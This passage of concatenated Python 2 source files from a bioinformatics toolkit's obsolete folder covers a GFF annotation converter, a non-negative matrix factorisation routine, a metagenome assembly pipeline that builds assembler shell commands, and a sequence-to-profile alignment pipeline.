version="%prog version: $Id: gff2annotator2tsv.py 2861 2010-02-23 17:36:32Z andreas $", usage=globals()["__doc__"])
parser.add_option("-g", "--genome-file", dest="genome_file", type="string",
help="filename with genome.")
parser.add_option("-f", "--features", dest="features", type="string",
help="feature to collect [default=None].")
parser.add_option("-i", "--files", dest="files", action="append",
help="use multiple annotations [default=None].")
parser.add_option("-a", "--annotations", dest="annotations", type="string",
help="aggregate name for annotations if only single file is provided from STDIN [default=None].")
parser.add_option("--input-filename-map", dest="input_filename_map", type="string",
help="filename with a map of gene_ids to categories [default=None].")
parser.add_option("--output-filename-synonyms", dest="output_filename_synonyms", type="string",
help="output filename for synonyms. For workspace building, the gff source will be used as the id (instead of the contig) [default=None].")
parser.add_option("-m", "--max-length", dest="max_length", type="string",
help="maximum segment length [default=None].")
parser.add_option("-s", "--section", dest="section", type="choice",
choices=("segments", "annotations", "annotations-genes",
"annotations-go", "workspace", "annotations-gff"),
help="annotator section [default=None].")
parser.add_option("--subset", dest="subsets", type="string", action="append",
help="add filenames to delimit subsets within the gff files. The syntax is filename.gff,label,filename.ids [default=None].")
parser.add_option("--remove-regex", dest="remove_regex", type="string",
help="regular expression of contigs to remove [default=None].")
parser.set_defaults(
genome_file=None,
feature=None,
section="segments",
annotations="annotations",
max_length=100000,
files=[],
subsets=[],
input_filename_map=None,
output_filename_synonyms=None,
input_format="gff",
remove_regex=None,
)
(options, args) = E.Start(parser)
options.files += args
if len(options.files) == 0:
options.files.append("-")
options.files = list(
itertools.chain(*[re.split("[,; ]+", x) for x in options.files]))
if options.subsets:
subsets = collections.defaultdict(list)
for s in options.subsets:
filename_gff, label, filename_ids = s.split(",")
subsets[filename_gff].append((label, filename_ids))
options.subsets = subsets
if options.genome_file:
fasta = IndexedFasta.IndexedFasta(options.genome_file)
else:
fasta = None
if options.section == "segments":
prefix = "##Segs"
elif options.section.startswith("annotations"):
prefix = "##Id"
elif options.section == "workspace":
prefix = "##Work"
else:
raise ValueError("unknown section %s" % options.section)
ninput, ncontigs, nsegments, ndiscarded = 0, 0, 0, 0
if options.remove_regex:
options.remove_regex = re.compile(options.remove_regex)
if options.section in ("segments", "workspace"):
iterator = GTF.iterator_filtered(GFF.iterator(options.stdin),
feature=options.feature)
if options.output_filename_synonyms:
outfile_synonyms = open(options.output_filename_synonyms, "w")
with_records = True
else:
outfile_synonyms = None
with_records = False
intervals = GTF.readAsIntervals(iterator, with_records=with_records)
ninput, nsegments, ndiscarded, ncontigs = \
PipelineEnrichment.outputSegments(options.stdout,
intervals,
options.section,
outfile_synonyms=outfile_synonyms,
max_length=options.max_length,
remove_regex=options.remove_regex)
if outfile_synonyms:
outfile_synonyms.close()
elif options.section == "annotations-go":
assert options.input_filename_map, "please supply option --input-filename-map"
iterator = GTF.iterator_filtered(GTF.iterator(options.stdin),
feature=options.feature)
geneid2categories = IOTools.readMultiMap(
open(options.input_filename_map, "r"))
category2segments = collections.defaultdict(list)
for contig, gffs in GTF.readAsIntervals(iterator, with_gene_id=True).items():
if options.remove_regex and options.remove_regex.search(contig):
continue
for start, end, geneid in gffs:
if geneid not in geneid2categories:
continue
for category in geneid2categories[geneid]:
category2segments[category].append(nsegments)
options.stdout.write(
"%s\t%i\t%s\t(%i,%i)\n" % (prefix, nsegments, contig, start, end))
nsegments += 1
for category, segments in category2segments.iteritems():
options.stdout.write(
"##Ann\t%s\t%s\n" % (category, "\t".join(["%i" % x for x in segments])))
E.info("set %s annotated with %i segments" %
(category, len(segments)))
elif options.section == "annotations":
for filename in options.files:
E.info("adding filename %s" % filename)
start = nsegments
is_gtf = False
if filename == "-":
iterator = GTF.iterator_filtered(GFF.iterator(sys.stdin),
feature=options.feature)
filename = options.annotations
elif filename.endswith(".gtf"):
is_gtf = True
with open(filename, "r") as infile:
iterator = GTF.iterator_filtered(GTF.iterator(infile),
feature=options.feature)
else:
with open(filename, "r") as infile:
iterator = GTF.iterator_filtered(GFF.iterator(infile),
feature=options.feature)
E.debug("processing %s" % (filename))
if not options.subsets or filename not in options.subsets:
for contig, gffs in GTF.readAsIntervals(iterator).items():
if options.remove_regex and options.remove_regex.search(contig):
continue
for x in gffs:
options.stdout.write(
"%s\t%i\t%s\t(%i,%i)\n" % (prefix, nsegments, contig, x[0], x[1]))
nsegments += 1
options.stdout.write("##Ann\t%s\t%s\n" % (
filename, "\t".join(["%i" % x for x in range(start, nsegments)])))
E.info("set %s annotated with %i segments" %
(filename, nsegments - start))
else:
raise ValueError("don't know how to filter %s" % filename)
elif options.section == "annotations-gff":
for filename in options.files:
if filename == "-":
iterator = GTF.iterator(sys.stdin)
else:
iterator = GTF.iterator_filtered(
GFF.iterator(open(filename, "r")))
segments = collections.defaultdict(list)
for gff in iterator:
segments[":".join((gff.source, gff.feature))].append(
(gff.contig, gff.start, gff.end))
feature2segments = {}
for feature, s in segments.iteritems():
s.sort()
s1 = nsegments
for contig, start, end in s:
if options.remove_regex and options.remove_regex.search(contig):
continue
options.stdout.write(
"%s\t%i\t%s\t(%i,%i)\n" % (prefix, nsegments, contig, start, end))
nsegments += 1
feature2segments[feature] = (s1, nsegments)
for feature, id_range in feature2segments.iteritems():
start, end = id_range
options.stdout.write("##Ann\t%s\t%s\n" % (
feature, "\t".join(["%i" % x for x in xrange(start, end)])))
E.info("set %s annotated with %i segments" %
(feature, end - start))
elif options.section == "annotations-genes":
for filename in options.files:
E.info("adding filename %s" % filename)
start = nsegments
assert filename.endswith(".gtf") or filename.endswith(".gtf.gz"), \
"requiring .gtf files for gene list filtering, received %s" % filename
infile = IOTools.openFile(filename)
iterator = GTF.iterator_filtered(GTF.iterator(infile),
feature=options.feature)
E.debug("processing %s" % (filename))
if not options.subsets or filename not in options.subsets:
# output all
for contig, gffs in GTF.readAsIntervals(iterator).items():
if options.remove_regex and options.remove_regex.search(contig):
continue
for x in gffs:
options.stdout.write(
"%s\t%i\t%s\t(%i,%i)\n" % (prefix, nsegments, contig, x[0], x[1]))
nsegments += 1
options.stdout.write("##Ann\t%s\t%s\n" % (
filename, "\t".join(["%i" % x for x in range(start, nsegments)])))
E.info("set %s annotated with %i segments" %
(filename, nsegments - start))
else:
# create subsets
E.debug("applying subsets for %s" % filename)
geneid2label, label2segments = collections.defaultdict(
list), {}
for label, filename_ids in options.subsets[filename]:
gene_ids = IOTools.readList(open(filename_ids, "r"))
for gene_id in gene_ids:
geneid2label[gene_id].append(label)
label2segments[label] = []
for contig, gffs in GTF.readAsIntervals(iterator, with_gene_id=True).items():
if options.remove_regex and options.remove_regex.search(contig):
continue
for start, end, gene_id in gffs:
if gene_id not in geneid2label:
continue
for label in geneid2label[gene_id]:
label2segments[label].append(nsegments)
options.stdout.write(
"%s\t%i\t%s\t(%i,%i)\n" % (prefix, nsegments, contig, start, end))
nsegments += 1
for label, segments in label2segments.iteritems():
options.stdout.write(
"##Ann\t%s\t%s\n" % (label, "\t".join(["%i" % x for x in segments])))
E.info("set %s (%s) annotated with %i segments" %
(label, filename, len(segments)))
E.info("ninput=%i, ncontigs=%i, nsegments=%i, ndiscarded=%i" %
(ninput, ncontigs, nsegments, ndiscarded))
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/obsolete/NMF.py
```python
from numpy import *
from numpy.linalg import norm
from time import time
def nmf(V, Winit, Hinit, tol, timelimit, maxiter, log=None):
"""
(c,W,H) = nmf(V,Winit,Hinit,tol,timelimit,maxiter)
W,H: output solution
c: output flag to indicate convergence
Winit,Hinit: initial solution
tol: tolerance for a relative stopping condition
timelimit, maxiter: limit of time and iterations
log: logfile
"""
W = Winit
H = Hinit
initt = time()
gradW = dot(W, dot(H, H.T)) - dot(V, H.T)
gradH = dot(dot(W.T, W), H) - dot(W.T, V)
initgrad = norm(r_[gradW, gradH.T])
if log:
log.write('# init gradient norm %f\n# progress: ' % initgrad)
tolW = max(0.001, tol) * initgrad
tolH = tolW
converged = False
for iter in xrange(1, maxiter):
# stopping condition
projnorm = norm(r_[gradW[logical_or(gradW < 0, W > 0)],
gradH[logical_or(gradH < 0, H > 0)]])
if projnorm < tol * initgrad:
if log:
log.write("\n# converged\n")
converged = True
break
if time() - initt > timelimit:
if log:
log.write("\n# time limit reached\n")
converged = False
break
(W, gradW, iterW) = nlssubprob(V.T, H.T, W.T, tolW, 1000, log)
W = W.T
gradW = gradW.T
if iterW == 1:
tolW = 0.1 * tolW
(H, gradH, iterH) = nlssubprob(V, W, H, tolH, 1000, log)
if iterH == 1:
tolH = 0.1 * tolH
if log and iter % 10 == 0:
log.write('.')
log.flush()
else:
converged = False
if log:
log.write("\n# iteration limit reached\n")
if log:
log.write('# Iter = %d Final proj-grad norm %f\n' % (iter, projnorm))
return (converged, W, H)
def nlssubprob(V, W, Hinit, tol, maxiter, log=None):
"""
H, grad: output solution and gradient
iter: #iterations used
V, W: constant matrices
Hinit: initial solution
tol: stopping tolerance
maxiter: limit of iterations
"""
H = Hinit
WtV = dot(W.T, V)
WtW = dot(W.T, W)
alpha = 1
beta = 0.1
for iter in xrange(1, maxiter):
grad = dot(WtW, H) - WtV
projgrad = norm(grad[logical_or(grad < 0, H > 0)])
if projgrad < tol:
break
# search step size
for inner_iter in xrange(1, 20):
Hn = H - alpha * grad
Hn = where(Hn > 0, Hn, 0)
d = Hn - H
gradd = sum(grad * d)
dQd = sum(dot(WtW, d) * d)
suff_decr = 0.99 * gradd + 0.5 * dQd < 0
if inner_iter == 1:
decr_alpha = not suff_decr
Hp = H
if decr_alpha:
if suff_decr:
H = Hn
break
else:
alpha = alpha * beta
else:
if not suff_decr or (Hp == Hn).all():
H = Hp
break
else:
alpha = alpha / beta
Hp = Hn
if iter == maxiter:
if log:
log.write('# max iteration in nlssubprob\n')
return (H, grad, iter)
```
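A minimal usage sketch for the projected-gradient NMF above. It assumes the file is importable as `NMF`; the matrix sizes, tolerance and iteration limits are illustrative only.
```python
# Factorise a random non-negative 50x20 matrix V into W (50x5) and H (5x20).
import sys
import numpy
from NMF import nmf

numpy.random.seed(0)
V = abs(numpy.random.randn(50, 20))          # non-negative data matrix
rank = 5
Winit = abs(numpy.random.randn(50, rank))    # random non-negative starting points
Hinit = abs(numpy.random.randn(rank, 20))

converged, W, H = nmf(V, Winit, Hinit,
                      tol=1e-4, timelimit=60, maxiter=1000, log=sys.stdout)
print "converged:", converged
print "reconstruction error:", numpy.linalg.norm(V - numpy.dot(W, H))
```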
#### File: cgat/obsolete/PipelineGenomeAssembly.py
```python
import sys
import re
import os
import tempfile
import collections
import shutil
import gzip
import sqlite3
import CGAT.IOTools as IOTools
import CGAT.Pipeline as P
import CGAT.Experiment as E
import CGATPipelines.PipelineMapping as PipelineMapping
import CGAT.FastaIterator as FastaIterator
import CGAT.Fastq as Fastq
import glob
import collections
import CGATPipelines.PipelineTracks as PipelineTracks
import metaphlan_utils
import numpy as np
class Format:
'''
class for assessing formats
'''
def fileFormat(self, infile):
'''
return the file format for the short read data
can be one of
fasta
fastq
fasta.gz
fastq.gz
fasta.1.gz
'''
possible_formats = ["fasta", "fastq", "fasta.gz", "fastq.gz", "fasta.1.gz", "fastq.1.gz"]
format = None
for f in possible_formats:
if infile.endswith(f):
format = f
assert format, "file %s is not of correct format" % infile
return format
class PairedData(Format):
'''
class for assessing paired end data
'''
def __init__(self):
self.format = None
self.paired = False
self.paired_interleaved = False
self.paired_separate = False
def getTrack(self, infile):
'''
return the track for the file
'''
return P.snip(infile, ".%s" % self.fileFormat(infile))
def getFormat(self, infile):
self.format = self.fileFormat(infile)
return self.format
def checkPairedFile(self, infile):
'''
        return the second-in-pair file that accompanies the
        input file of first-in-pair reads
'''
format = self.getFormat(infile)
track = self.getTrack(infile)
read2 = track + ".fastq.2.gz"
assert len(glob.glob(read2)) > 0, "cannot find %s file for read 2 in the pair for %s" % (read2, infile)
return ("separate", read2)
def checkPairs(self, infile):
'''
        check whether read pairs are interleaved within a single file;
        if not, look for a separate file containing the second read
        of each pair
'''
format = self.getFormat(infile)
paired = False
inf = IOTools.openFile(infile)
pairs = set()
if format in ["fasta", "fasta.gz"]:
iterator = FastaIterator.iterator
elif format in ["fastq", "fastq.gz"]:
iterator = Fastq.iterate
elif format in ["fasta.1.gz", "fastq.1.gz"]:
return self.checkPairedFile(infile)
for record in iterator(inf):
# make sure there are not other "/" in the sequence name
seq_id = record.title.split("/")
assert len(seq_id) == 2, "cannot deal with this sequence name %s" % record.title
seq_id = seq_id[0]
if seq_id not in pairs:
pairs.add(seq_id)
else:
print "found pair for %s: %s" % (seq_id, record.title)
paired = "interleaved"
break
return paired
############################
# function for performing
# calculation of stats
############################
def contig_to_stats(contigs_file, stats_file, params):
'''
calculate descriptive stats for a set
of contigs / scaffolds
'''
PARAMS = params
if PARAMS["filter"]:
f = PARAMS["filter"]
else:
f = 0
# iterate over the contigs/scaffolds and return stats
number_of_scaffolds = 0
N = PARAMS["scaffold_n"]
scaffold_lengths = []
inf = open(contigs_file)
for record in FastaIterator.iterate(inf):
scaffold_length = len(list(record.sequence))
if scaffold_length >= f:
number_of_scaffolds += 1
scaffold_lengths.append(scaffold_length)
# mean, median and max contig/scaffold lengths
mean_length = np.mean(scaffold_lengths)
median_length = np.median(scaffold_lengths)
max_length = max(scaffold_lengths)
# iterate over contigs/scaffolds sorted by longest
    # and calculate the NX
index = 0
cum_length = 0
total_length = sum(scaffold_lengths)
for length in sorted(scaffold_lengths, reverse = True):
while cum_length <= total_length*(float(N)/100):
index += 1
cum_length += length
# output the results
outf = open(stats_file, "w")
outf.write("nscaffolds\tscaffold_length\tN%i\tmedian_length\tmean_length\tmax_length\n" % N)
outf.write("%s\t%s\t%s\t%s\t%s\t%s\n" % (number_of_scaffolds, total_length, sorted(scaffold_lengths, reverse = True)[index], str(median_length), str(mean_length), str(max_length)))
###############################
###############################
###############################
def build_scaffold_lengths(contigs_file, outfile, params):
'''
output the distribution of scaffold lengths
'''
PARAMS = params
if PARAMS["filter"]:
f = PARAMS["filter"]
else:
f = 0
inf = open(contigs_file)
outf = open(outfile, "w")
outf.write("scaffold_name\tlength\n")
for record in FastaIterator.iterate(inf):
scaffold_length = len(list(record.sequence))
if scaffold_length > f:
# rename sequences if they have a space in them
outf.write("%s\t%i\n" % (record.title.replace(" ", "_"), scaffold_length))
outf.close()
############################
# general assembler class
############################
class Assembler(PairedData):
'''
general class for assembly algorithms
'''
def __init_(self):
self.kmer = 0
self.format = None
self.read_type = None
self.exp_cov = None
self.stats_file = None
self.compressed = False
##########################
# meta-velvet
##########################
class Metavelvet(Assembler):
'''
velvet single genome assembly software
'''
def build(self, infile):
'''
run velveth and velvetg
followed by meta-velvetg
'''
outdir = P.getTempDir()
format = self.getFormat(infile)
paired = self.checkPairs(infile)
if len(paired) > 1:
pair = paired[0]
files = " ".join([infile, paired[1]])
else:
pair = paired
files = infile
if format == "fastq.1.gz":
format = "fastq.gz"
metavelvet_dir = os.path.join(os.getcwd(), "metavelvet.dir")
track = self.getTrack(infile)
self.stats_file = track + ".stats.txt"
        # velveth and velvetg have to be run to build hash tables and initial de Bruijn graphs
statement = '''%%(velveth_executable)s %(outdir)s %%(kmer)i -%(format)s -shortPaired -%(pair)s %(files)s
; cd %(outdir)s; %%(velvetg_executable)s %(outdir)s -exp_cov auto -ins_length %%(velvetg_insert_length)i
; %%(metavelvet_executable)s %(outdir)s -ins_length %%(velvetg_insert_length)i
; mv %(outdir)s/Roadmaps %(metavelvet_dir)s/%(track)s.roadmaps
; gzip %(metavelvet_dir)s/%(track)s.roadmaps
; mv %(outdir)s/Sequences %(metavelvet_dir)s/%(track)s.sequences
; gzip %(metavelvet_dir)s/%(track)s.sequences
; mv %(outdir)s/Graph2 %(metavelvet_dir)s/%(track)s.graph2
; gzip %(metavelvet_dir)s/%(track)s.graph2
; mv %(outdir)s/meta-velvetg.contigs.fa %(metavelvet_dir)s/%(track)s.contigs.fa
; sed -i 's/in/_in/g' %(outdir)s/meta-velvetg.Graph2-stats.txt
; mv %(outdir)s/meta-velvetg.Graph2-stats.txt %(metavelvet_dir)s/%(track)s.stats.txt
; rm -rf %(outdir)s''' % locals()
return statement
##########################
# meta-idba
##########################
class Idba(Metavelvet):
'''
meta-idba contig assembler
'''
def preprocess(self, infile):
'''
fastq files need to be converted to fasta
and pairs need to be merged
'''
mtype = None
# check for paired end data either in the same file or in a separate file
# for each read - will need to be gunzipped
# check compression status
if infile.endswith(".gz"):
if len(self.checkPairs(infile)) > 1: # check for paired data in separate files
read1 = infile
read2 = self.checkPairs(infile)[1]
temp = P.getTempDir()
read1_new = os.path.join(temp, P.snip(infile, ".gz"))
read2_new = os.path.join(temp, P.snip(self.checkPairs(infile)[1], ".gz"))
zippy = """gunzip -c %(read1)s > %(read1_new)s
; gunzip -c %(read2)s > %(read2_new)s; """ % locals()
elif self.checkPairs == "interleaved":
infile_new = os.path.join(temp, P.snip(infile, ".gz"))
zippy = """gunzip -c %(infile)s > %(infile_new)s; """ % locals()
else:
zippy = ""
# only need to convert if the data are in fastq format
if self.getFormat(infile).find("fastq") != -1 and len(self.checkPairs(infile)) >1: # reads are fastq and paired in separate files
mtype = "--merge" # argument for conversion tool
elif self.getFormat(infile).find("fastq") != -1 and self.checkPairs(infile) == "interleaved": # reads are fastq and in the same file
mtype = "--paired" # argument for conversion tool
# build statement
if mtype: # the reads are paired end
if mtype == "--merge":
outf = P.snip(os.path.basename(read1_new), ".fastq.1") + ".fa"
statement = '''%(zippy)s
fq2fa %(mtype)s %(read1_new)s %(read2_new)s %(outf)s
''' % locals()
elif mtype == "--paired":
outf = P.snip(os.path.basename(infile_new), ".fastq") + ".fa"
statement = '''%(zippy)s
fq2fa %(mtype)s %(infile_new)s %(outf)s
rm -rf %(temp)s''' % locals()
else:
statement = None
return statement
def build(self, infile):
'''build statement for running idba
'''
track = self.getTrack(infile)
# create single fasta file if required (reads are fastq format)
if self.preprocess(infile):
inf = track + ".fa"
if not os.path.exists(inf):
statement = self.preprocess(infile)
job_options = " -l mem_free=30G"
to_cluster = True
P.run()
else:
inf = infile
# build statement
track = self.getTrack(infile)
outdir = "idba.dir"
data_options = ["%(idba_options)s"]
data_options = " ".join(data_options)
statement = '''%%(idba_executable)s -r %(inf)s -o %(outdir)s %(data_options)s
; mv idba.dir/scaffold.fa idba.dir/%(track)s.scaffold.fa''' % locals()
return statement
##########################
# Ray meta
##########################
class Ray(Idba):
'''
ray contig assembler
'''
def build(self, infile):
'''
build statement for running Ray
'''
track = self.getTrack(infile)
format = self.getFormat(infile)
paired = self.checkPairs(infile)
tempdir = P.getTempDir()
# check whether the data are paired-end
if len(paired) > 1:
pair = paired[0]
# Ray doesn't like .fastq.1.gz etc
read1 = infile
read2 = paired[1]
read1_new = os.path.join(tempdir,read1.replace(".fastq.1.gz", ".1.fastq"))
read2_new = os.path.join(tempdir,read2.replace(".fastq.2.gz", ".2.fastq"))
files = " ".join([read1_new, read2_new])
else:
pair = paired
files = infile
raydir = os.path.join(os.getcwd(), "ray.dir")
# Ray picks up file types so should just have to
# say whether its paired or not
print files
# build statement
common_options = "-k %(kmer)s"
if pair == "interleaved":
filetype = "-i"
elif not pair:
filetype = "-s"
elif pair == "separate":
filetype = "-p"
else:
raise IOError, "do not support file of this type: %s" % infile
statement = '''gunzip -c %(read1)s > %(read1_new)s
; gunzip -c %(read2)s > %(read2_new)s
; %%(ray_executable)s %(common_options)s %(filetype)s %(files)s -o %(raydir)s
; checkpoint; mv %(raydir)s/Scaffolds.fa %(raydir)s/%(track)s.scaffolds.fa
; mv %(raydir)s/ScaffoldComponents.txt %(raydir)s/%(track)s.scaffold_components.txt
; mv %(raydir)s/ScaffoldLengths.txt %(raydir)s/%(track)s.scaffold_lengths.txt
; mv %(raydir)s/ScaffoldLinks.txt %(raydir)s/%(track)s.scaffold_links.txt
                       ; mv %(raydir)s/Contigs.fa %(raydir)s/%(track)s.contigs.fa
; mv %(raydir)s/OutputNumbers.txt %(raydir)s/%(track)s.numbers.txt
                       ; mkdir %(raydir)s/graph
                       ; mv %(raydir)s/CoverageDistribution.txt %(raydir)s/graph/%(track)s.coverage_distribution.txt
; mv %(raydir)s/CoverageDistributionAnalysis.txt %(raydir)s/graph/%(track)s.coverage_distribution_analysis.txt
; mv %(raydir)s/degreeDistribution.txt %(raydir)s/graph/%(track)s.degree_distribution.txt
; mv %(raydir)s/Kmers.txt %(raydir)s/graph/%(track)s.kmers.txt
; mkdir %(raydir)s/assembly
; mv %(raydir)s/SeedLengthDistribution.txt %(raydir)s/assembly/%(track)s.seed_length_distribution.txt
; mv %(raydir)s/LibraryStatistics.txt %(raydir)s/%(track)s.library_statistics.txt
; mv %(raydir)s/LibraryData.xml %(raydir)s/%(track)s.library_data.xml
; rm -rf %(tempdir)s''' % locals()
return statement
##########################
# metaphlan
##########################
class Metaphlan(Idba):
'''
    metaphlan is more of an annotation tool
    and therefore may be removed from this pipeline
    - however it is directly relevant for metagenome sequencing
'''
def build(self, infile, method="read_map"):
'''
build statement for running metaphlan
'''
track = self.getTrack(infile)
# create single fasta file if required (reads are fastq format)
inf = track + ".fa"
if not os.path.exists(inf):
job_options = " -l mem_free=30G"
to_cluster = True
if self.preprocess(infile):
statement = self.preprocess(infile)
P.run()
else:
inf = infile
if method == "read_map":
statement = '''cat %(inf)s
| python %%(scriptsdir)s/metaphlan.py -t reads_map
--input_type multifasta %%(method)s %%(metaphlan_db)s --no_map
| python %%(scriptsdir)s/metaphlan2table.py -t read_map
--log=%%(outfile)s.log
> %%(outfile)s''' % locals()
elif method == "rel_ab":
statement = '''cat %(inf)s
| python %%(scriptsdir)s/metaphlan.py -t rel_ab
--input_type multifasta %%(method)s %%(metaphlan_db)s --no_map
| python %%(scriptsdir)s/metaphlan2table.py -t rel_ab
--log=%%(outfile)s.log
> %%(outfile)s''' % locals()
else:
raise ValueError, "do not support method %s" % method
return statement
##########################
# cortex_var
##########################
class Cortex_var(Idba):
'''
cortex genome assembler
'''
def build(self,infile):
track = self.getTrack(infile)
format = self.getFormat(infile)
if format.endswith(".gz"):
format = P.snip(format, ".gz")
format = format.upper()
# cortex_var only uses paired end information to
# remove pcr duplicates
if not self.checkPairs(infile):
paired = "--se_list"
reads = os.path.join(os.getcwd(), infile)
elif len(self.checkPairs(infile)) > 1:
paired = "--pe_list"
read1 = infile
format = P.snip(format, ".1")
read2 = self.checkPairs(infile)[1]
elif self.checkPairs(infile) == "interleaved":
raise ValueError, "pipeline does not support file of type 'interleaved'"
temp = P.getTempDir()
read1_new = os.path.join(temp, P.snip(read1, ".1.gz"))
read2_new = os.path.join(temp, P.snip(read2, ".2.gz"))
# paired end list
list1 = open("cortex_var.dir/read1.txt", "w")
list2 = open("cortex_var.dir/read2.txt", "w")
list1.write(read1_new + "\n")
list2.write(read2_new + "\n")
list1.close()
list2.close()
list1 = os.path.abspath("cortex_var.dir/read1.txt")
list2 = os.path.abspath("cortex_var.dir/read2.txt")
reads = ",".join([os.path.join(os.getcwd(), x) for x in [read1_new, read2_new]])
statement = ''' gunzip -c %(read1)s > %(read1_new)s
; gunzip -c %(read2)s > %(read2_new)s
; cd cortex_var.dir
; %%(cortex_var_executable)s %(paired)s %(list1)s,%(list2)s
--format %(format)s
--mem_height 15
--quality_score_threshold %%(cortex_var_qual_threshold)i
--remove_pcr_duplicates
--remove_low_coverage_supernodes %%(cortex_var_rm_low_coverage_supernodes)i
--sample_id %(track)s
--kmer_size %%(kmer)s
--dump_binary dump_binary.ctx
; rm -rf %(temp)s
''' % locals()
return statement
```
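For orientation, a hedged sketch of calling the two stand-alone stats helpers defined above. The file names are placeholders, and the snippet assumes the module (with its CGAT dependencies) is importable as `PipelineGenomeAssembly`.
```python
# contig_to_stats() and build_scaffold_lengths() only need a contigs FASTA plus
# a params mapping with "filter" (minimum scaffold length) and "scaffold_n"
# (the N-value to report, e.g. 50 for the N50).
import PipelineGenomeAssembly as PGA

PARAMS = {"filter": 200, "scaffold_n": 50}

PGA.contig_to_stats("sample.contigs.fa", "sample.contigs.stats.tsv", PARAMS)
PGA.build_scaffold_lengths("sample.contigs.fa", "sample.scaffold_lengths.tsv", PARAMS)
```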
#### File: cgat/obsolete/pipeline_prdm9.py
```python
from ruffus import *
import sys
import glob
import gzip
import os
import itertools
import CGAT.CSV as CSV
import re
import math
import types
import optparse
import shutil
import sqlite3
import CGAT.GFF as GFF
import CGAT.GTF as GTF
import CGAT.Experiment as E
import CGAT.Pipeline as P
import CGAT.IOTools as IOTools
import CGAT.Genomics as Genomics
import CGAT.Database as Database
import CGAT.FastaIterator as FastaIterator
import PipelineGeneset as PGeneset
import PipelineGO as PGO
import scipy.stats
import CGAT.Stats as Stats
import alignlib
import CGAT.Mali as Mali
PARAMS = P.getParameters()
@files( (("../data/znf.data", "profile.fasta" ) , ))
def createProfile( infile, outfile ):
'''convert mali to profile
'''
outfile = open(outfile, "w")
for line in open(infile):
if line.startswith("#"): continue
data = re.split("\s+", line[:-1],1)
print data
pid, sequence = data
outfile.write(">%s\n%s\n" % (pid, sequence ))
outfile.close()
def getParts( src ):
'''split a wrap-around alignment'''
result = None
r = []
last_s = src.getColTo()
for p in range( src.getRowFrom(),
src.getRowTo() ):
s = src.mapRowToCol(p)
if s < 0: continue
if last_s >= s:
if result:
r.append( result )
result = alignlib.makeAlignmentVector()
last_s = s
result.addPair( s, p, 0 )
if result:
r.append( result )
return r
def alignIndels( all_alleles, colcounts, extend_by = 0 ):
'''align all indel-regions.'''
aa = alignlib.makeAlignatorDPFull( alignlib.ALIGNMENT_LOCAL, 0, 0 )
alignator = alignlib.makeMultipleAlignatorSimple( aa)
ids = all_alleles.keys()
for x,c in enumerate(colcounts):
if c <= 1: continue
sequences = alignlib.StringVector()
for sid in ids:
for allele in all_alleles[sid]:
sequences.append( allele[x] )
mali = alignlib.makeMultAlignment()
alignator.align( mali, sequences )
realigned = []
for line in str(alignlib.MultAlignmentFormatPlain( mali, sequences )).split("\n")[:-1]:
data = line[:-1].split("\t")
realigned.append( data[1] )
assert len(realigned) == len(sequences)
l = max( [len(r) for r in realigned] )
i = 0
for sid in ids:
for allele in all_alleles[sid]:
if realigned[i]: allele[x] = realigned[i]
else: allele[x] = "-" * l
i += 1
colcounts[x] = l
def _alignToProfile( infile, outfile,
min_score = 0 ):
'''align sequences in *infile* against mali
Only alignments with a score higher than *min_score* are accepted.
Output multiple alignment in fasta format to *outfile* and a table
in :file:`outfile.log`.
'''
mali = Mali.Mali()
mali.readFromFile( open("../data/mouse.fasta") )
src_mali = Mali.convertMali2Alignlib( mali )
E.debug( "read mali: %i sequences x %i columns" % (mali.getNumSequences(), mali.getNumColumns() ))
# add pseudocounts
profile_mali = mali.getClone()
n = profile_mali.getNumColumns()
for x in "ACGT":
for y in range(0,2):
profile_mali.addSequence( "%s%i" % (x,y), 0, n, x * n )
profile_mali = Mali.convertMali2Alignlib( profile_mali )
alignlib.setDefaultEncoder( alignlib.getEncoder( alignlib.DNA4 ) )
alignlib.setDefaultLogOddor( alignlib.makeLogOddorUniform() )
# bg = alignlib.FrequencyVector()
# bg.extend( ( 0.3, 0.1, 0.2, 0.2, 0.2) )
# alignlib.setDefaultRegularizor( alignlib.makeRegularizorTatusov(
# alignlib.makeSubstitutionMatrixDNA4(),
# bg,
# "ACGTN",
# 10.0, 1.0) )
profile = alignlib.makeProfile( profile_mali )
alignment_mode = alignlib.ALIGNMENT_WRAP
alignator = alignlib.makeAlignatorDPFull( alignment_mode,
-5.0,
-0.5 )
map_seq2profile = alignlib.makeAlignmentVector()
map_rseq2profile = alignlib.makeAlignmentVector()
profile.prepare()
# print profile
build_mali = alignlib.makeMultAlignment()
m = alignlib.makeAlignmentVector()
m.addDiagonal( 0, n, 0 )
build_mali.add( src_mali, m )
outf = open( outfile, "w" )
outf_log = open( outfile + ".info", "w" )
outf_log.write( "read_id\tlength\tstart\tend\tparts\tcovered\tpcovered\tscore\tmali_start\tmali_end\tmali_covered\tmali_pcovered\n" )
sequences, aa = alignlib.StringVector(), alignlib.AlignandumVector()
ids = []
for pid in mali.getIdentifiers():
sequences.append( re.sub( "-", "", mali[pid] ) )
ids.append( pid )
# print str(alignlib.MultAlignmentFormatPlain( build_mali, sequences ))
c = E.Counter()
for s in FastaIterator.FastaIterator( open(infile)):
E.debug("adding %s" % s.title )
c.input += 1
rsequence = Genomics.complement(s.sequence)
seq = alignlib.makeSequence( s.sequence )
rseq = alignlib.makeSequence( rsequence )
alignator.align( map_seq2profile, seq, profile )
alignator.align( map_rseq2profile, rseq, profile )
if map_seq2profile.getScore() > map_rseq2profile.getScore():
m, seq, sequence = map_seq2profile, seq, s.sequence
else:
m, seq, sequence = map_rseq2profile, rseq, rsequence
if m.getLength() == 0:
c.skipped += 1
continue
if m.getScore() < min_score:
c.skipped += 1
continue
r = getParts( m )
covered = 0
for mm in r:
build_mali.add( mm )
sequences.append( sequence )
ids.append( s.title )
covered += mm.getLength() - mm.getNumGaps()
mali_covered = m.getColTo() - m.getColFrom()
outf_log.write( "\t".join( map(str, (
s.title,
len(s.sequence),
m.getRowFrom(),
m.getRowTo(),
len(r),
covered,
"%5.2f" % (100.0 * covered / len(s.sequence) ),
m.getScore(),
m.getColFrom(),
m.getColTo(),
mali_covered,
"%5.2f" % ((100.0 * mali_covered) / mali.getNumColumns())
) ) ) + "\n" )
c.output += 1
#build_mali.expand( aa )
result = str(alignlib.MultAlignmentFormatPlain( build_mali,
sequences,
alignlib.UnalignedStacked ))
for pid, data in zip(ids, result.split("\n") ):
start, sequence, end = data.split("\t")
outf.write(">%s/%i-%i\n%s\n" % (pid, int(start)+1, int(end), sequence) )
outf.close()
outf_log.close()
E.info( "%s\n" % str(c) )
@follows(createProfile)
